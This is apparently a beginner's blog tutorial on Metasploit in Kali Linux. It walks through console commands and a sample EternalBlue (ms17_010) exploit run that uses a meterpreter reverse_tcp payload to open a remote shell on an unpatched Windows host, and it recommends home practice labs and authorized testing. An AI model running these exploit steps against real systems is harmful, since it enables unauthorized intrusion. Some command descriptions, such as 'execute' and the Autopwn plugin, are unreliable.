So you've installed Kali Linux and want to try out the powerful penetration testing tool Metasploit. With a rich feature set and vibrant community support, Metasploit can look intimidating for beginners. But learning the basics is easier than it seems.

An Introduction to Metasploit

The Metasploit Framework is an open-source tool for developing and executing exploit code against remote target machines. It provides useful exploits that attackers can use to break into systems. But it also helps security professionals and enthusiasts test the vulnerability of their own networks.

In simpler words, Metasploit allows you to act like an attacker to uncover weaknesses in a system before a real attacker can exploit them.

Some key things you can do with the Framework on Kali Linux include:

• Scan networks and systems for known vulnerabilities

• Test exploits against vulnerable systems

• Develop customized exploits for new vulnerabilities

So while this powerful tool is commonly associated with malicious hackers, it was created to empower protection and prevention.

Installing Metasploit Correctly

Metasploit comes built-in with Kali Linux. So normally you don't need to install it separately.

Simply click on Applications > Kali Linux > Exploitation Tools > Metasploit Framework to open it.

But if for some reason Metasploit is not showing up or working properly, you can try reinstalling it:

1. Open a terminal window in Kali.

2. Type apt update && apt full-upgrade to fully update the OS packages.

3. Install Metasploit by typing apt install metasploit-framework

This will reinstall the latest stable version of Metasploit suitable for your OS architecture (32-bit or 64-bit).

Once installed, you can launch Metasploit from the Application Menu similar to before.

Your First Metasploit Console

When you open the Metasploit Framework for the first time, you'll land on the Console interface. This is the heart of Metasploit CLI (command line interface).

It may look complex with walls of text at first glance. But let's break it down step-by-step:

Starting the Database

The Console needs a database to store information and track sessions. PostgreSQL database comes bundled with Metasploit.

To initialize a database, use the command:

msfdb init

You'll only need to run this command once as it creates the database structure.

Then start and connect to the database for the current session with:

msfdb start

Hosting a Session

To start hosting an attack session, type:

msfconsole

The prompt will change to msf > indicate that you are now inside the Metasploit session handler.

Basic Console Commands

Here are some of the basic commands you would need to maneuver around the console:

• help - Get help menu for msfconsole commands

• search [term] - Finds modules related to the given search term. Like exploits, payloads, etc.

• use [module path] - Select a module from search results to use

• show [options] - Displays configurable options of the selected module

• set [option] [value] - Change the value of any configurable option

• execute [action] - Run the selected module

That sums up the basic flow inside msfconsole.

Select a module using use, set appropriate options with set, then execute it to run.

Also read - Exploring Directories Recursively with ls in Linux

Running an Exploit Sample

Let's select one of the most common exploits to practice with. We'll try gaining remote access through the 'Eternal Blue' SMB vulnerability.

Note that for this demo to work, we need target machines in the same network with SMB exposed and unpatched Windows systems. More on setting up practice labs later.

Selecting the EternalBlue Exploit

First search for 'eternal' exploits:

msf > search eternal

Among the results, you'll find an exploit module called exploit/windows/smb/ms17_010_eternalblue. Let's use it:

msf > use exploit/windows/smb/ms17_010_eternalblue

This selects the EternalBlue exploit module for use.

Checking Options

Before running a module blindly, always check what options you can configure:

msf > show options

For the EternalBlue exploit, important options are RHOSTS which is the target IP address and PAYLOAD which determines what gets executed on vulnerable systems.

Setting Options

If we want to inject a simple remote cmd shell on vulnerable Windows systems, use payload as windows/meterpreter/reverse_tcp:

msf > set PAYLOAD windows/meterpreter/reverse_tcp

Provide the local host IP as the LHOST value it asks for. This is where the meterpreter shell will connect back to.

And set RHOSTS to the IP address of your Windows target machine.

Executing Metasploit Exploit

With that configured, execute the exploit:

msf > exploit

If everything is configured properly, you'll get a new meterpreter session open once the exploit runs successfully.

Interact with the session to start the remote cmd shell on the exploited machine for further penetration testing.

And that's the basic flow of selecting Metasploit modules and running exploits with it.

Setting Up Your Own Practice Labs

While random IP scanning on public networks for practicing Metasploit is not advisable, you can build safe home labs to try out tools without risks.

Here are some quick DIY hacking lab solutions you can use for practicing Metasploit Framework:

Virtualbox Lab with VulnHub

VirtualBox allows creating and running multiple virtual machines easily on your OS. With premade vulnerable VM images from VulnHub, you can simulate entire labs to practice Metasploit.

Download VirtualBox, set up a host-only network, then import VulnHub box images like Mr Robot, Kioptrix, Stapler, etc. These come with known vulnerabilities to exploit using Metasploit.

Raspberry Pi Army

Buy a bunch of Raspberry Pi SBCs and install vulnerable operating systems on them. Build your own IOT village of hackable devices with Raspberry Pis!

You can connect the Pis over a LAN or to your laptop over a WiFi hotspot for easy access.

Purchase Physical Machines

Dedicated penetration testers can invest in used laptops and PCs to build physical Windows and Linux boxes to hack without restrictions. Physical machines allow testing a broader spectrum of exploits.

While practice labs are safer, you can also try penetration testing officially after getting permission from owners 😉.

Exploring Metasploit Plugins for Kali

Metasploit Framework offers tons of inbuilt modules and advanced functionality through plugins developed by community members.

Using these plugins you can further enhance your pentesting process with Metasploit.

Autopwn - Metasploit Automation

For example, the Autopwn plugin tries to automatically run through Metasploit modules to exploit vulnerabilities without manual intervention.

Simply activate autopwn after selecting an exploit target, rest will be handled automatically.

Scanner - Finding Exploits

Scanner addon helps scan network ranges for potential targets. It also fingerprints services running to detect known vulnerabilities and then suggests compatible Metasploit modules.

So manually searching for individual IPs is simplified.

There are 100s of such useful addons for scanning, sniffing traffic, automating Metasploit functions, etc.

Exploring these allows you to significantly improve hacking capabilities with Metasploit Framework on Kali Linux. GitHub hosts a number of updated Metasploit plugins that you can reference.

Responsible Disclosure: Practice Legally & Ethically

Now that you know your way around Metasploit console and running exploits, it's critical I emphasize this - hacking without permission is illegal!

So setting up authorized practice environments like home labs, capturing flags in Vulnhub VMs, etc., are safer first steps before jumping to public scanning and real-world tests.

Additionally, once vulnerabilities are discovered even during authorized tests, responsibly disclosing them to concerned parties helps mitigate risks. So they can patch issues before actual attacks happen.

Use tools like Metasploit mindfully, without causing harm. Remember with great power comes great responsibility.

Wrapping Up

I hope this intro guide gave you a good overview of Metasploit Framework essentials on Kali Linux.

We went through starting the msfconsole, selecting exploits, configuring options, executing modules, and interacting with remote shells.

You also know how to set up safe practice environments using virtual machines and Raspberry Pi devices. And explored some handy plugins to further extend Metasploit capabilities.